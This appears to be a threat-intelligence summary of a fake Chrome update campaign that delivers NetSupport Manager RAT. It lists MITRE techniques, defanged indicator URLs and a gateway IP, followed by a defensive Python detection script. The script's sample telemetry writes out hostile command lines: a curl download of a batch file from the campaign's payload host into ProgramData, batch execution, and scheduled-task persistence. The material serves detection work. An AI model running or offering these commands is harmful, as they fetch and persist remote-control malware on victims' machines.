Exploring New Techniques of Fake Browser Updates Leading to NetSupport RAT

Trellix detected a campaign that uses fake Chrome browser updates to lure victims into installing NetSupport Manager RAT, enabling data theft and remote control of infected machines. The operation shows similarities to the SocGholish activity, though links are not conclusive and toolsets differ. Hashtags: #NetSupportManager #SocGholish

Keypoints

  • Campaign detected in late June 2023 centers on fake Chrome update pages used to deliver NetSupport Manager RAT.
  • Compromised websites load malicious JavaScript from the threat actor’s command-and-control server to facilitate infection.
  • The lure leads to a ZIP (UpdateInstall.zip) containing Browser_portable.js, which downloads the next stage.
  • Second-stage Chrome_update.js downloads 1.bat via curl in ProgramData, then 2.bat installs and runs the RAT.
  • VBScript and Batch scripts are used, with some VBScript content not executed while batch components perform primary downloads and execution.
  • Persistence is established via scheduled tasks, and the RAT is configured to communicate with a gateway (5.252.178.48) for ongoing control.

MITRE Techniques

  • [T1189] Drive-by Compromise – The campaign uses compromised sites to present a fake Chrome browser update to entice victims, leading them to install a remote administration software tool (RAT). “The campaign uses compromised sites to present a fake Chrome browser update to entice victims, leading them to install a remote administration software tool (RAT) called NetSupport Manager.”
  • [T1105] Ingress Tool Transfer – The second stage JavaScript downloads a batch file and components using curl, enabling the next stage of payload. “The second stage JavaScript, “Chrome_update.js”, is a downloader. It downloads a batch file, “1.bat”, in the local ‘C://ProgramData’ folder and executes it.”
  • [T1059.005] VBScript – VBScript files are used in the download chain, with incomplete execution noted. “The VBScript files are still in development or act as a dummy as it is noted that the “Wscrit.Arguments” is misspelled and the scripts are not executed.”
  • [T1059.003] Windows Command Shell – Batch scripts execute and use curl to download further components. “the batch files are executed and use “curl” to download further components.”
  • [T1053.005] Scheduled Task – The RAT is executed via scheduled tasks, establishing persistence and startup execution. “The NetSupport Manager RAT is extracted using the downloaded 7-zip utility and executed through scheduled tasks in the victim computer… persistence mechanism.”
  • [T1027] Obfuscated/Compressed Files and Information – Second-stage code is obfuscated and padded with junk strings to hinder analysis. “Chrome_update.js… heavily padded with junk comment strings.”

Indicators of Compromise

  • [URLs] compromised sites hosting malicious content – altiordp[.]com/cdn/www.php, cheetahsnv[.]com/cdn-js/wds.min.php, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat
  • [Files] downloaded and executed components – 1.bat, 2.bat, Chrome_update.js, UpdateInstaller.zip, Browser_portable.js, tempy.7z, 7zz.exe (and 4+ other files)
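Added defender-side example, not code from the Trellix report: a Python script that refangs the indicators listed above and runs behavioural rules for the chain described in the MITRE section (curl dropping into ProgramData, batch execution from ProgramData, 7-zip extraction, scheduled-task creation, contact with the listed gateway IP) over constructed telemetry lines. The pipe-separated log format, host names, timestamps, rule names, the intranet.example URL and the placeholder RAT path are all assumptions made for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Indicators copied from the IoC list above, kept defanged until compared.
DEFANGED_URLS = [
    "altiordp[.]com/cdn/www.php",
    "cheetahsnv[.]com/cdn-js/wds.min.php",
    "ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat",
    "ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat",
    "ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z",
    "ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe",
]
GATEWAY_IP = "5.252.178.48"


def refang(ioc: str) -> str:
    """Restore a defanged indicator ("x[.]com", "hxxp://") so it can be compared against logs."""
    return ioc.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")


IOC_DOMAINS = {refang(u).split("/")[0].lower() for u in DEFANGED_URLS}

# Behavioural rules derived from the infection chain in the MITRE section
# (rule name, technique, parent image regex, image regex, command line regex).
# Rule names are this example's own labels, not identifiers from the report.
RULES = [
    ("curl-drop-to-programdata", "T1105", r"(?i)^(wscript|cmd)\.exe$", r"(?i)^curl\.exe$",
     r"(?i)-o\s+\"?c:\\programdata\\"),
    ("bat-run-from-programdata", "T1059.003", r".*", r"(?i)^cmd\.exe$",
     r"(?i)c:\\programdata\\[^\s\"]+\.bat"),
    ("7z-extract-in-programdata", "T1027", r"(?i)^cmd\.exe$", r"(?i)^7zz\.exe$",
     r"(?i)\bx\b.*\.7z"),
    ("schtasks-create", "T1053.005", r"(?i)^cmd\.exe$", r"(?i)^schtasks\.exe$",
     r"(?i)/create\b"),
]


def parse_event(line: str) -> Optional[dict]:
    """Parse one line of the constructed pipe-separated telemetry format:
    PROC: ts|host|PROC|parent_image|image|command_line
    NET:  ts|host|NET|destination|url
    """
    parts = line.rstrip("\n").split("|", 5)
    if len(parts) < 4:
        return None
    ts, host, kind = parts[0], parts[1], parts[2]
    if kind == "PROC" and len(parts) == 6:
        return {"ts": ts, "host": host, "kind": kind, "parent": parts[3],
                "image": parts[4], "cmdline": parts[5]}
    if kind == "NET":
        return {"ts": ts, "host": host, "kind": kind, "dest": parts[3].lower(),
                "url": parts[4] if len(parts) > 4 else ""}
    return None


def match_event(ev: dict) -> List[str]:
    """Return the names of every IoC or behaviour rule that fires on one event."""
    hits = []
    if ev["kind"] == "NET":
        if ev["dest"] in IOC_DOMAINS:
            hits.append("ioc-domain:" + ev["dest"])
        if ev["dest"] == GATEWAY_IP:
            hits.append("ioc-gateway:" + GATEWAY_IP)
        return hits
    for name, technique, parent_re, image_re, cmd_re in RULES:
        if (re.search(parent_re, ev["parent"]) and re.search(image_re, ev["image"])
                and re.search(cmd_re, ev["cmdline"])):
            hits.append(f"{name} ({technique})")
    return hits


def analyze(lines: List[str]) -> Dict[str, List[str]]:
    """Group distinct hits per host; a host with two or more distinct hits is reported."""
    per_host: Dict[str, set] = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for hit in match_event(ev):
            per_host[ev["host"]].add(hit)
    return {host: sorted(hits) for host, hits in per_host.items() if len(hits) >= 2}


# Constructed sample telemetry: WS01 shows the full chain, WS02 only benign admin use of curl.
SAMPLE_LOG = [
    r"2023-06-28T10:01:02|WS01|NET|cheetahsnv.com|http://cheetahsnv.com/cdn-js/wds.min.php",
    r"2023-06-28T10:01:40|WS01|PROC|wscript.exe|curl.exe|curl -o C:\ProgramData\1.bat http://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084",
    r"2023-06-28T10:01:41|WS01|PROC|wscript.exe|cmd.exe|cmd /c C:\ProgramData\1.bat",
    r"2023-06-28T10:01:50|WS01|PROC|cmd.exe|7zz.exe|7zz.exe x C:\ProgramData\tempy.7z -oC:\ProgramData\tmp",
    r"2023-06-28T10:01:55|WS01|PROC|cmd.exe|schtasks.exe|schtasks /create /sc onlogon /tn Update /tr C:\ProgramData\tmp\PLACEHOLDER_RAT.exe",
    r"2023-06-28T10:02:10|WS01|NET|5.252.178.48|",
    r"2023-06-28T11:00:00|WS02|PROC|cmd.exe|curl.exe|curl -o C:\Users\bob\Downloads\report.pdf https://intranet.example/report.pdf",
    r"2023-06-28T11:00:30|WS02|PROC|explorer.exe|cmd.exe|cmd /c dir C:\Users\bob",
]

if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_LOG).items():
        print(host, hits)
```

Requiring two distinct hits per host before reporting keeps a lone curl download from paging anyone, while the chain on WS01 (IoC domain, drop into ProgramData, batch run, 7-zip extraction, scheduled task, gateway contact) produces six independent hits; mapping each rule to the technique IDs in the MITRE section makes the output easy to tie back to this report during triage.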

Read more: https://www.trellix.com/en-us/about/newsroom/stories/research/new-techniques-of-fake-browser-updates.html